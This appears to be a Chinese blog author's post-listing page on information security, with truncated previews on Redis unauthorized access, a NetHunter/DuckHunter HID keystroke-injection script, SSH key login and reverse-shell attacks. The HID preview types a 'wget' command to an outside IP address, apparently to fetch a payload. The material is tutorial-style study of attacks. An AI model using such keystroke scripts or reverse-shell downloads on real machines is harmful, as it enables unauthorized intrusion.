![](https://img-blog.csdnimg.cn/20201014180756754.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
信息安全
Morpho.K
这个作者很懒,什么都没留下…
展开
-
Redis未授权访问漏洞
http://www.cnblogs.com/xiaozi/p/7568272.html测试条件:开启Redis服务Redis服务以Root启动服务绑定0.0.0.0(外网可以访问)存在未授权问题(弱密码)防范:修改默认端口设置强密码限制外网访问操作:查找Redis服务器 - 6379端口(组件指纹)python脚本访问目标 socket ip 6379非返回...原创 2018-10-06 21:48:33 · 105 阅读 · 0 评论 -
第一章
功能 — 利用例:手机——usb——电脑NetHunter 操作系统DuckHunter HID 工具CONTROL SPACESTRING itermENTERENTERSTRING ifconfigENTER原理:模拟键盘操作反弹Shell攻击CONTROL SPACESTRING itermENTERENTERSTRING wget http://45.32...转载 2018-11-06 14:37:14 · 161 阅读 · 0 评论 -
服务器免密登录-秘钥验证
2 是否有公钥0 生成0 生成0 拷贝4 公钥加密的随机数1 请求3 公钥加密的随机数5 私钥解密的随机数6 验证解密结果7 解密结果正确 允许登录服务器公钥客户端私钥客户端生成私钥和公钥,并把公钥拷贝给服务器端;客户端发起登录请求,发送自己的相关信息;服务器端根据客户端发来的信息查找是否存有该客户端的公钥,若没有拒绝登录,若有则生成一段随机数使用该公钥加密后发送给客户端;客户端收到服务...原创 2018-11-05 20:31:30 · 288 阅读 · 0 评论 -
反弹Shell攻击
反弹Shell攻击什么是一般的正向攻击:攻击服务器链接目标(e.g. 远程桌面、ssh、web服务、telnet…)反弹:受害者主机主动链接攻击服务器为什么正向攻击不能实现目标在局域网内目标ip动态变化目标防火墙:只能发出请求,不能接受病毒木马等 不清楚对方开机和网络情况怎么做让目标服务器下载bash到主机让目标运行bashbash 让服务器连接至攻击主机...原创 2018-11-18 15:37:55 · 1241 阅读 · 0 评论